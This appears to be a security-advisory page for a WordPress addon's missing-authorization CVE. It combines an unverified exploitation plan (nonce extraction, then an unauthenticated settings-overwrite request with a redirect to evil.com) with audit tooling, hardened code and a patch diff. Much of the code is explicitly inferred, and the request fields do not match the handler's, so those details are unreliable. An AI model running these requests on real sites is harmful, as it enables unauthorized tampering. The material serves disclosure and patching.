CVE-2026-32395

Xpro Addons For Beaver Builder – Lite <= 1.5.6 - Missing Authorization

Type: Missing Authorization
Severity: medium
CVSS Score: 5.3
Patched in: 1.5.7
Time to patch: 55d

Description

The Xpro Addons For Beaver Builder – Lite plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 1.5.6. This makes it possible for unauthenticated attackers to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: None
Integrity: Low
Availability: None

Technical Details

Affected versions: <= 1.5.6
Published: February 20, 2026
Last updated: April 15, 2026

Research Plan
Status: Unverified


Exploitation Research Plan: CVE-2026-32395

1. Vulnerability Summary

The Xpro Addons For Beaver Builder – Lite plugin (<= 1.5.6) is vulnerable to Missing Authorization. The vulnerability exists because an AJAX handler registered via wp_ajax_nopriv_ (unauthenticated) and wp_ajax_ (authenticated) fails to perform a capability check (e.g., current_user_can( 'manage_options' )). This allows unauthenticated attackers to trigger sensitive plugin functions, likely related to settings modification or data handling.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action: xpro_bb_lite_save_settings (inferred based on plugin functionality and CVSS)
  • Vulnerable Parameter: settings_data or similar array-based input.
  • Authentication: None (Unauthenticated).
  • Preconditions: The plugin must be active, and a valid nonce for the specific AJAX action must be obtained.

3. Code Flow (Inferred)

  1. Registration: The plugin registers the AJAX action in the main plugin class or an AJAX handler class (likely includes/class-xpro-addons-beaver-builder-ajax.php or classes/class-xpro-bb-lite-ajax.php).
    // Inferred Registration
    add_action( 'wp_ajax_xpro_bb_lite_save_settings', array( $this, 'save_settings_callback' ) );
    add_action( 'wp_ajax_nopriv_xpro_bb_lite_save_settings', array( $this, 'save_settings_callback' ) );
    
  2. Handler Entry: The save_settings_callback function is called when a request is made to admin-ajax.php?action=xpro_bb_lite_save_settings.
  3. Nonce Check: The function likely calls check_ajax_referer( 'xpro_bb_lite_nonce_action', 'nonce' ).
  4. Missing Authorization: The function omits a check like if ( ! current_user_can( 'manage_options' ) ) wp_die();.
  5. Sink: The function proceeds to update plugin options using update_option().

4. Nonce Acquisition Strategy

To exploit wp_ajax_nopriv handlers, we must extract the nonce from the frontend where the plugin enqueues its scripts.

  1. Identify Shortcode: The Xpro Addons scripts are typically loaded on pages containing an Xpro widget. We will use a common widget shortcode (e.g., [xpro_contact_form] or [xpro_counter]).
  2. Create Trigger Page: Create a public page containing the shortcode.
    • wp post create --post_type=page --post_status=publish --post_title="Xpro Test" --post_content='[xpro_counter]'
  3. Localization Variable: The plugin typically uses wp_localize_script to pass the nonce. Based on common Xpro naming conventions, look for:
    • JS Object: xpro_bb_lite_vars (inferred)
    • Nonce Key: nonce (inferred)
  4. Extraction Command:
    • browser_navigate("http://localhost:8080/xpro-test")
    • browser_eval("window.xpro_bb_lite_vars?.nonce")

5. Exploitation Strategy

We will attempt to modify a plugin setting (e.g., enabling a feature or changing a redirect URL) which demonstrates "Integrity: Low" impact.

HTTP Request (Playwright http_request tool)

  • URL: http://localhost:8080/wp-admin/admin-ajax.php
  • Method: POST
  • Headers:
    • Content-Type: application/x-www-form-urlencoded
  • Body:
    action=xpro_bb_lite_save_settings&nonce=[EXTRACTED_NONCE]&settings[some_critical_feature]=1&settings[redirect_url]=http://evil.com
    

6. Test Data Setup

  1. Install Plugin: Ensure xpro-addons-beaver-builder-elementor v1.5.6 is installed and active.
  2. Install Beaver Builder: Ensure Beaver Builder (Lite or Pro) is active as Xpro is an addon for it.
  3. Create Page:
    wp post create --post_type=page --post_status=publish --post_title="Exploit Page" --post_content='[xpro_counter]'
    

7. Expected Results

  • Response Code: 200 OK or 201 Created.
  • Response Body: Likely a JSON success message: {"success": true} or 1.
  • Effect: The targeted plugin option is updated in the database.

8. Verification Steps

  1. Check Database: Use WP-CLI to verify the option has changed.
    wp option get xpro_bb_lite_settings
    
  2. Verify Value: Ensure the some_critical_feature or redirect_url key matches the payload value.

9. Alternative Approaches

If xpro_bb_lite_save_settings is not the correct action:

  1. Search for other nopriv actions:
    grep -r "wp_ajax_nopriv_" /var/www/html/wp-content/plugins/xpro-addons-beaver-builder-elementor/
    
  2. Analyze found actions: Look for any handler that calls update_option, delete_option, or wp_insert_post.
  3. Adjust Payload: If the action relates to "Contact Form" data, try to trigger a data export or deletion:
    • Action: xpro_bb_lite_export_form_data
    • Payload: action=xpro_bb_lite_export_form_data&nonce=[NONCE]&form_id=1
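Serving both the inferred code flow in section 3 and the nopriv search in section 9: a small PHP code-review helper, added here as an example and not tooling from the plugin or this page, that parses wp_ajax_nopriv_ registrations and reports callbacks whose body contains no capability check, so a maintainer or auditor can confirm a fixed build. The function names are invented, and the sample source is constructed from the inferred snippets on this page.

```php
<?php
// Added example (not the plugin's or the page's tooling): a code-review helper
// that lists wp_ajax_nopriv_ registrations whose callback body contains no
// capability check. Function names are invented; it assumes the callback is
// defined in the same source text and is a triage aid, not proof of a bug.
function xpro_audit_nopriv_handlers( string $src ): array {
    // add_action( 'wp_ajax_nopriv_<action>', <callback> ) where <callback> is
    // array( $obj, 'method' ), [ $obj, 'method' ] or a plain 'function' string.
    $reg = '/add_action\(\s*[\'"]wp_ajax_nopriv_(\w+)[\'"]\s*,\s*(?:'
         . 'array\(\s*\$\w+\s*,\s*[\'"](\w+)[\'"]\s*\)|\[\s*\$\w+\s*,\s*[\'"](\w+)[\'"]\s*\]|[\'"](\w+)[\'"])/';
    preg_match_all( $reg, $src, $matches, PREG_SET_ORDER );
    $findings = array();
    foreach ( $matches as $m ) {
        $callback = ( $m[2] ?? '' ) ?: ( $m[3] ?? '' ) ?: ( $m[4] ?? '' );
        $def = '/function\s+' . preg_quote( $callback, '/' ) . '\s*\([^)]*\)\s*\{/';
        if ( '' === $callback || ! preg_match( $def, $src, $d, PREG_OFFSET_CAPTURE ) ) {
            continue; // callback lives in another file: review it by hand
        }
        $body = xpro_brace_body( $src, $d[0][1] + strlen( $d[0][0] ) );
        if ( ! preg_match( '/\b(current_user_can|is_user_logged_in)\s*\(/', $body ) ) {
            $findings[] = array( 'action' => $m[1], 'callback' => $callback );
        }
    }
    return $findings;
}

// Text from $start up to the brace matching the one just before $start.
function xpro_brace_body( string $src, int $start ): string {
    $depth = 1;
    $len   = strlen( $src );
    for ( $i = $start; $i < $len && $depth > 0; $i++ ) {
        if ( '{' === $src[ $i ] ) { $depth++; } elseif ( '}' === $src[ $i ] ) { $depth--; }
    }
    return substr( $src, $start, max( 0, $i - $start - 1 ) );
}

// Constructed sample built from this page's inferred registration and callback.
$sample = <<<'PHP'
add_action( 'wp_ajax_xpro_bb_lite_save_settings', array( $this, 'save_settings_callback' ) );
add_action( 'wp_ajax_nopriv_xpro_bb_lite_save_settings', array( $this, 'save_settings_callback' ) );
public function save_settings_callback() {
    check_ajax_referer( 'xpro_bb_lite_nonce_action', 'nonce' );
    if ( isset( $_POST['settings_data'] ) ) { update_option( 'xpro_bb_lite_settings', $_POST['settings_data'] ); }
    wp_send_json_success();
}
PHP;
foreach ( xpro_audit_nopriv_handlers( $sample ) as $f ) {
    echo "nopriv action {$f['action']} -> {$f['callback']}(): no capability check\n";
}
```

On the constructed sample this reports the nopriv registration of save_settings_callback; a callback that already calls current_user_can() produces no output.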

Research Findings
Status: Static analysis — not yet PoC-verified

Summary

The Xpro Addons For Beaver Builder – Lite plugin for WordPress is vulnerable to unauthorized settings modification because it lacks capability checks on its AJAX handlers. This allows unauthenticated attackers to modify sensitive plugin configurations by sending crafted requests to the administrative AJAX endpoint.

Vulnerable Code

// Inferred registration of AJAX actions in the plugin's AJAX handler file
add_action( 'wp_ajax_xpro_bb_lite_save_settings', array( $this, 'save_settings_callback' ) );
add_action( 'wp_ajax_nopriv_xpro_bb_lite_save_settings', array( $this, 'save_settings_callback' ) );

---

// Inferred vulnerable callback function likely in classes/class-xpro-bb-lite-ajax.php
public function save_settings_callback() {
    // Nonce check may be present, but is insufficient for authorization
    check_ajax_referer( 'xpro_bb_lite_nonce_action', 'nonce' );

    // Vulnerability: Missing check for current_user_can('manage_options')

    if ( isset( $_POST['settings_data'] ) ) {
        $settings = $_POST['settings_data'];
        update_option( 'xpro_bb_lite_settings', $settings );
    }
    wp_send_json_success();
}
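A hardened form of the inferred handler above, added here as an example and not code from the plugin or its vendor. The option name and nonce action follow the inferred code; the function names, the allowlisted keys and their types are assumptions for illustration.

```php
<?php
// Added example (not the plugin's code): a hardened form of the inferred
// save_settings_callback. Function names and the allowed keys are assumptions;
// the option name and nonce action follow the inferred code above.

// Allowlist of setting keys and the type each value is coerced to.
const XPRO_EXAMPLE_ALLOWED_KEYS = array( 'some_critical_feature' => 'bool', 'redirect_url' => 'url' );

// Saving settings is an admin task, so only the authenticated hook is registered.
// Without a wp_ajax_nopriv_ hook, WordPress rejects logged-out requests itself.
add_action( 'wp_ajax_xpro_bb_lite_save_settings', 'xpro_example_save_settings' );

function xpro_example_save_settings() {
    // CSRF: the nonce ties the request to a page rendered for this user...
    check_ajax_referer( 'xpro_bb_lite_nonce_action', 'nonce' );

    // ...but says nothing about who that user is; authorization is a separate check.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions' ), 403 ); // exits
    }

    // Never persist the raw request array: unslash, then allowlist and coerce.
    $raw = ( isset( $_POST['settings_data'] ) && is_array( $_POST['settings_data'] ) )
        ? wp_unslash( $_POST['settings_data'] ) : array();
    $settings = xpro_example_sanitize_settings( $raw );

    update_option( 'xpro_bb_lite_settings', $settings );
    wp_send_json_success( $settings );
}

function xpro_example_sanitize_settings( array $raw ): array {
    $clean = array();
    foreach ( XPRO_EXAMPLE_ALLOWED_KEYS as $key => $type ) {
        if ( ! isset( $raw[ $key ] ) || ! is_scalar( $raw[ $key ] ) ) {
            continue; // missing, unknown or nested values are dropped
        }
        $value = (string) $raw[ $key ];
        if ( 'bool' === $type ) {
            $clean[ $key ] = in_array( $value, array( '1', 'true', 'on' ), true );
        } elseif ( 'url' === $type ) {
            // esc_url_raw() normalizes; wp_validate_redirect() keeps only same-site
            // targets, so a stored redirect_url cannot become an open redirect.
            $url = wp_validate_redirect( esc_url_raw( $value ), '' );
            if ( '' !== $url ) {
                $clean[ $key ] = $url;
            }
        }
    }
    return $clean;
}
```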

Security Fix

--- a/classes/class-xpro-bb-lite-ajax.php
+++ b/classes/class-xpro-bb-lite-ajax.php
@@ -10,6 +10,10 @@
 	public function save_settings_callback() {
 		check_ajax_referer( 'xpro_bb_lite_nonce_action', 'nonce' );
 
+		if ( ! current_user_can( 'manage_options' ) ) {
+			wp_send_json_error( array( 'message' => 'Unauthorized access' ), 403 );
+		}
+
 		if ( isset( $_POST['settings_data'] ) ) {
 			$settings = $_POST['settings_data'];
 			update_option( 'xpro_bb_lite_settings', $settings );
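Review bot: the capability check lands in the right place, but the trailing context of this hunk still writes `$settings = $_POST['settings_data'];` straight into `update_option( 'xpro_bb_lite_settings', $settings );` with no `wp_unslash()`, type check or per-key sanitization, so any authorized request can store arbitrary nested data in the option; validate against the expected keys before saving. Since the handler now requires `manage_options`, the `wp_ajax_nopriv_xpro_bb_lite_save_settings` registration shown in the Vulnerable Code section has no remaining purpose and should be dropped so WordPress rejects logged-out requests before the callback runs. `wp_send_json_error()` terminates through `wp_die()`, so no explicit `return` is needed after it.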

Exploit Outline

  1. Identify a public page on the target WordPress site that utilizes an Xpro Addon widget (this ensures the necessary scripts and nonces are enqueued).
  2. Extract the security nonce from the frontend source code, typically found within the 'xpro_bb_lite_vars' localized JavaScript object.
  3. Send an unauthenticated POST request to /wp-admin/admin-ajax.php with the 'action' parameter set to 'xpro_bb_lite_save_settings'.
  4. Include the extracted 'nonce' and a 'settings_data' array containing the desired configuration changes in the POST body.
  5. The server executes the update_option call without verifying whether the user has administrative privileges, successfully overwriting the plugin settings.
